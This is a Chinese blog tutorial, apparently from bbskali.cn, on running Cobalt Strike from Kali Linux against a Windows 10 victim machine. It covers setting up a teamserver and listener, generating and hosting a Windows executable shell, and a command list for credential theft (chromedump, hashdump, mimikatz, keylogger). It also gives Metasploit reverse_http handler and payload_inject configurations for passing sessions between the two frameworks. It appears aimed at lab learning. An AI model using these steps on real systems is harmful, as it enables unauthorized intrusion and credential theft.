Cobalt Strike从入门到放弃

博主： literature
发布时间：2021 年 06 月 24 日
120 次浏览
关闭评论
3091字数
分类：主机教程

环境介绍

kali linux 2021
Cobalt Strike4.3
windows10(受害机)

在kali中安装Cobalt Strike

在kali中安装很简单，Cobalt Strike是基于Java的。因为kali中已经安装了Java环境，所以我们直接可以运行Cobalt Strike。
进入Cobalt Strike目录，执行./start.sh即可运行Cobalt Strike。

这样便启动了Cobalt Strike
如上会提示登录
这时我们需要启动登录服务，因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令：

./teamserver 192.168.123.33 pass66
#./teamserver kali的ip 登录密码

生成shell

首先配置监听
和msfconsole类似，Cobalt Strike也要配置监听。
Cobalt Strike——Listeners——Add

相关参数说明：

参数	说明
name	监听任务的名称可随意
payload	监听的方式支持`http` `https` `TCP` 等
HTTPS HOSTS	主机IP地址
Host Rotation Strategy	主机转移策略一般默认即可

生成shell
Attacks—Packages——windows ececutable

配置windows平台下的shell

保存生成的shell

参数	说明
HTML Application	基于http方式的攻击，如受害者打开网站即可获得shell
MS Office Macro	office宏攻击，如打开word文档即可获得shell
Payload Generator	其他方式的payload,如`C` `python` `vb`
windows ececutable	生成windows平台下的shell

Shell上线
将生成的shell放到/var/www/html,并启动apache服务器

cp kali.exe /var/www/html
service apache2 start

当目标主机下载并运行shell后，我们便可以看到回弹。

对目标主机的操作

interact 命令模式

当我们点击interact后，便会和msfconsole一样，进入命令模式。
现列出常用的命名

参数	说明
argue	匹配进程的欺骗参数
blockdlls	阻止子进程中的非Microsoft DLL
browserpivot	设置浏览器会话
cancel	取消正在进行的下载
cd	改变目录位置
checkin	呼叫总部并发布数据
chromedump	从Google Chrome恢复凭据
clear	清除信标队列
connect	通过TCP连接到目标
covertvpn	部署隐蔽VPN客户端
cp	复制文件
dcsync	从DC提取密码哈希
desktop	查看目标桌面并与之交互
dllinject	bbskali.cn
dllload	将反射DLL注入进程
download	文件下载
downloads	列出正在下载的文件
drives	列出目标上的驱动器
elevate	在提升的上下文中生成会话
exit	关闭当前连接
getprivs	对当前令牌启用系统权限
getsystem	提升系统权限
getuid	获取用户ID
hashdump	导出hash密码
keylogger	记录键盘
kill	Kill 掉进程
logonpasswords	使用mimikatz转储凭据和哈希
ls	列出文件列表 bbskali.cn
make_token	创建一个 token
mimikatz	运行神器 mimikatz
mkdir	创建一个目录
mv	移动文件
net	网络和主机枚举
upload	上传文件

如获取C盘文件信息

cd /
ls

和目标屏幕交互

desktop

其他菜单操作

由于比较多，就不一个个说了。把常用的几个菜单说说。

可视化的文件浏览

Explore-File Browser

对局域网内所有设备扫描

显示目标的所有进程

Cobalt Strike与Msfconsole联动

首先我们在Cobalt Strike中创建一个新的Foreign Http监听

然后在msfconsole中配置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.123.33
set LPORT 4444
exploit

返回Cobalt Strike，选择目标，右键Spawn选择我们前面配置的Foreign Http监听

这时，我们返回到msf中便可以看到成功得到回弹。

将msf会话转移到Cobalt Strike

一样，我们先建立一个http的监听

因为在msf中我们已经获得了session
在其配置如下：

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.123.33
set LPORT 5555
set SESSION 1
run

set DisablePayloadHandler true 作用是msf不监听，代表是用来返给其他监听的。
然后我们返回到Cobalt Strike这时便可以看到会话了

其他文章推荐

《Cobalt Strike 目标上线微信提示》
《Cobalt Strike入坑指南(利用office文件获取shell)》

未完待续……

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/2592.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

最后修改：2023 年 08 月 04 日

如果觉得我的文章对你有用，请随意赞赏

此处评论已关闭

Cobalt Strike从入门到放弃

literature • 2021 年 06 月 24 日

<p><img src="https://blog.bbskali.cn/usr/uploads/2021/06/16558686.png" alt="Cobalt Strike kali install" title="Cobalt Strike kali install" style="" class="aligncenter"style=""></p><h3>环境介绍</h3><ul>
 <li>kali linux 2021</li>
 <li>Cobalt Strike4.3</li>
 <li>windows10(受害机)</li>
</ul><h3>在kali中安装Cobalt Strike</h3><p>在kali中安装很简单，Cobalt Strike是基于Java的。因为kali中已经安装了Java环境，所以我们直接可以运行Cobalt Strike。<br />进入Cobalt Strike目录，执行<code>./start.sh</code>即可运行Cobalt Strike。<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/2406252097.jpg" alt="start.jpg" title="start.jpg" style="" class="aligncenter"style=""><br />这样便启动了Cobalt Strike<br />如上会提示登录<br />这时我们需要启动登录服务，因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令：</p><pre><code>./teamserver 192.168.123.33 pass66
#./teamserver kali的ip 登录密码</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2021/06/3557920270.jpg" alt="Cobalt Strike界面介绍" title="Cobalt Strike界面介绍" style="" class="aligncenter"style=""></p><h3>生成shell</h3><p><strong>首先配置监听</strong><br />和msfconsole类似，Cobalt Strike也要配置监听。<br /><code>Cobalt Strike</code>——<code>Listeners</code>——<code>Add</code><br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/2674098583.jpg" alt="payload" title="payload" style="" class="aligncenter"style=""><br /><strong>相关参数说明：</strong></p><table>
 <thead>
  <tr>
   <th>参数</th>
   <th>说明</th>
  </tr>
 </thead>
 <tbody>
  <tr>
   <td>name</td>
   <td>监听任务的名称 可随意</td>
  </tr>
  <tr>
   <td>payload</td>
   <td>监听的方式 支持<code>http</code> <code>https</code> <code>TCP</code> 等</td>
  </tr>
  <tr>
   <td>HTTPS HOSTS</td>
   <td>主机IP地址</td>
  </tr>
  <tr>
   <td>Host Rotation Strategy</td>
   <td>主机转移策略 一般默认即可</td>
  </tr>
 </tbody>
</table><p><strong>生成shell</strong><br /><code>Attacks</code>—<code>Packages</code>——<code>windows ececutable </code></p><p><img src="https://blog.bbskali.cn/usr/uploads/2021/06/4189776995.jpg" alt="shell" title="shell" style="" class="aligncenter"style=""><br />配置windows平台下的shell<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/3034508622.jpg" alt="windows shell" title="windows shell" style="" class="aligncenter"style=""><br />保存生成的shell<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/2404616281.jpg" alt="save shell" title="save shell" style="" class="aligncenter"style=""></p><table>
 <thead>
  <tr>
   <th>参数</th>
   <th>说明</th>
  </tr>
 </thead>
 <tbody>
  <tr>
   <td>HTML Application</td>
   <td>基于http方式的攻击，如受害者打开网站即可获得shell</td>
  </tr>
  <tr>
   <td>MS Office Macro</td>
   <td>office宏攻击，如打开word文档即可获得shell</td>
  </tr>
  <tr>
   <td>Payload Generator</td>
   <td>其他方式的payload,如<code>C</code> <code>python</code> <code>vb</code></td>
  </tr>
  <tr>
   <td>windows ececutable</td>
   <td>生成windows平台下的shell</td>
  </tr>
 </tbody>
</table><p><strong>Shell上线</strong><br />将生成的shell放到/var/www/html,并启动apache服务器</p><pre><code>cp kali.exe /var/www/html
service apache2 start</code></pre><p>当目标主机下载并运行shell后，我们便可以看到回弹。<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/977578119.jpg" alt="目标主机上线" title="目标主机上线" style="" class="aligncenter"style=""></p><h3>对目标主机的操作</h3><p><img src="https://blog.bbskali.cn/usr/uploads/2021/06/2328470837.jpg" alt="对目标主机的操作" title="对目标主机的操作" style="" class="aligncenter"style=""></p><h4>interact 命令模式</h4><p>当我们点击<code>interact</code>后，便会和msfconsole一样，进入命令模式。<br />现列出常用的命名</p><table>
 <thead>
  <tr>
   <th>参数</th>
   <th>说明</th>
  </tr>
 </thead>
 <tbody>
  <tr>
   <td>argue</td>
   <td>匹配进程的欺骗参数</td>
  </tr>
  <tr>
   <td>blockdlls</td>
   <td>阻止子进程中的非Microsoft DLL</td>
  </tr>
  <tr>
   <td>browserpivot</td>
   <td>设置浏览器会话</td>
  </tr>
  <tr>
   <td>cancel</td>
   <td>取消正在进行的下载</td>
  </tr>
  <tr>
   <td>cd</td>
   <td>改变目录位置</td>
  </tr>
  <tr>
   <td>checkin</td>
   <td>呼叫总部并发布数据</td>
  </tr>
  <tr>
   <td>chromedump</td>
   <td>从Google Chrome恢复凭据</td>
  </tr>
  <tr>
   <td>clear</td>
   <td>清除信标队列</td>
  </tr>
  <tr>
   <td>connect</td>
   <td>通过TCP连接到目标</td>
  </tr>
  <tr>
   <td>covertvpn</td>
   <td>部署隐蔽VPN客户端</td>
  </tr>
  <tr>
   <td>cp</td>
   <td>复制文件</td>
  </tr>
  <tr>
   <td>dcsync</td>
   <td>从DC提取密码哈希</td>
  </tr>
  <tr>
   <td>desktop</td>
   <td>查看目标桌面并与之交互</td>
  </tr>
  <tr>
   <td>dllinject</td>
   <td>bbskali.cn</td>
  </tr>
  <tr>
   <td>dllload</td>
   <td>将反射DLL注入进程</td>
  </tr>
  <tr>
   <td>download</td>
   <td>文件下载</td>
  </tr>
  <tr>
   <td>downloads</td>
   <td>列出正在下载的文件</td>
  </tr>
  <tr>
   <td>drives</td>
   <td>列出目标上的驱动器</td>
  </tr>
  <tr>
   <td>elevate</td>
   <td>在提升的上下文中生成会话</td>
  </tr>
  <tr>
   <td>exit</td>
   <td>关闭当前连接</td>
  </tr>
  <tr>
   <td>getprivs</td>
   <td>对当前令牌启用系统权限</td>
  </tr>
  <tr>
   <td>getsystem</td>
   <td>提升系统权限</td>
  </tr>
  <tr>
   <td>getuid</td>
   <td>获取用户ID</td>
  </tr>
  <tr>
   <td>hashdump</td>
   <td>导出hash密码</td>
  </tr>
  <tr>
   <td>keylogger</td>
   <td>记录键盘</td>
  </tr>
  <tr>
   <td>kill</td>
   <td>Kill 掉进程</td>
  </tr>
  <tr>
   <td>logonpasswords</td>
   <td>使用mimikatz转储凭据和哈希</td>
  </tr>
  <tr>
   <td>ls</td>
   <td>列出文件列表 bbskali.cn</td>
  </tr>
  <tr>
   <td>make_token</td>
   <td>创建一个 token</td>
  </tr>
  <tr>
   <td>mimikatz</td>
   <td>运行神器 mimikatz</td>
  </tr>
  <tr>
   <td>mkdir</td>
   <td>创建一个目录</td>
  </tr>
  <tr>
   <td>mv</td>
   <td>移动文件</td>
  </tr>
  <tr>
   <td>net</td>
   <td>网络和主机枚举</td>
  </tr>
  <tr>
   <td>upload</td>
   <td>上传文件</td>
  </tr>
 </tbody>
</table><h4>如获取C盘文件信息</h4><pre><code>cd /
ls</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2021/06/888042451.jpg" alt="C盘文件信息" title="C盘文件信息" style="" class="aligncenter"style=""></p><h4>和目标屏幕交互</h4><pre><code>desktop</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2021/06/781326271.jpg" alt="桌面交互" title="桌面交互" style="" class="aligncenter"style=""></p><h3>其他菜单操作</h3><p>由于比较多，就不一个个说了。把常用的几个菜单说说。</p><h4>可视化的文件浏览</h4><p><code>Explore</code>-<code>File Browser</code><br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/492942438.jpg" alt="文件浏览" title="文件浏览" style="" class="aligncenter"style=""><br />对局域网内所有设备扫描<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/1631457974.jpg" alt="" title="" style="" class="aligncenter"style=""><br />显示目标的所有进程<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/2953123429.jpg" alt="进程" title="进程" style="" class="aligncenter"style=""></p><h3>Cobalt Strike与Msfconsole联动</h3><p>首先我们在Cobalt Strike中创建一个新的<code>Foreign Http</code>监听<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/2416432167.jpg" alt="" title="" style="" class="aligncenter"style=""><br />然后在msfconsole中配置监听</p><pre><code>use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.123.33
set LPORT 4444
exploit</code></pre><p>返回Cobalt Strike，选择目标，右键<code>Spawn</code>选择我们前面配置的<code>Foreign Http</code>监听<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/1809327384.jpg" alt="" title="" style="" class="aligncenter"style=""><br />这时，我们返回到msf中便可以看到成功得到回弹。<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/2966967677.jpg" alt="" title="" style="" class="aligncenter"style=""></p><h3>将msf会话转移到Cobalt Strike</h3><p>一样，我们先建立一个http的监听<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/1224569499.jpg" alt="" title="" style="" class="aligncenter"style=""><br />因为在msf中我们已经获得了session<br />在其配置如下：</p><pre><code>use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.123.33
set LPORT 5555
set SESSION 1
run</code></pre><p><img src="https://blog.bbskali.cn/usr/uploads/2021/06/2090594238.jpg" alt="" title="" style="" class="aligncenter"style=""><br /><code>set DisablePayloadHandler true</code> 作用是msf不监听，代表是用来返给其他监听的 。<br />然后我们返回到Cobalt Strike这时便可以看到会话了<br /><img src="https://blog.bbskali.cn/usr/uploads/2021/06/1407497591.jpg" alt="" title="" style="" class="aligncenter"style=""></p><h3>其他文章推荐</h3><p><span class="external-link"><i data-feather="external-link"></i>《Cobalt Strike 目标上线微信提示》</span><br /><span class="external-link"><i data-feather="external-link"></i>《Cobalt Strike入坑指南(利用office文件获取shell)》</span></p><p>未完待续……</p><p><hr class="content-copyright" style="margin-top:50px"></p><div class="post-copyright" style="font-style:normal"><p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：https://blog.bbskali.cn/2592.html</p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>

Cobalt Strike从入门到放弃

环境介绍

在kali中安装Cobalt Strike

生成shell

对目标主机的操作

interact 命令模式

如获取C盘文件信息

和目标屏幕交互

其他菜单操作

可视化的文件浏览

Cobalt Strike与Msfconsole联动

将msf会话转移到Cobalt Strike

其他文章推荐

live/msn等微软绝版邮箱详细的注册教程

欢迎使用 Typecho

一个功能强大又好用的RSS订阅器：FreshRSS安装教程

VPS使用BaiduPCS-Go高速下载百度网盘的文件，支持上传/离线下载等操作

使用Caddy申请免费的Let’s Encrypt泛域名SSL证书

博客已搬到ImpactVPS，顺便说下网站快速搬家的方法

情人节你该怎样做到“持久”

在Linux中查看系统信息

Wordpress <= 4.9.6 任意文件删除漏洞

使用Java, AppleScript对晓黑板进行定时自动打卡

Cobalt Strike从入门到放弃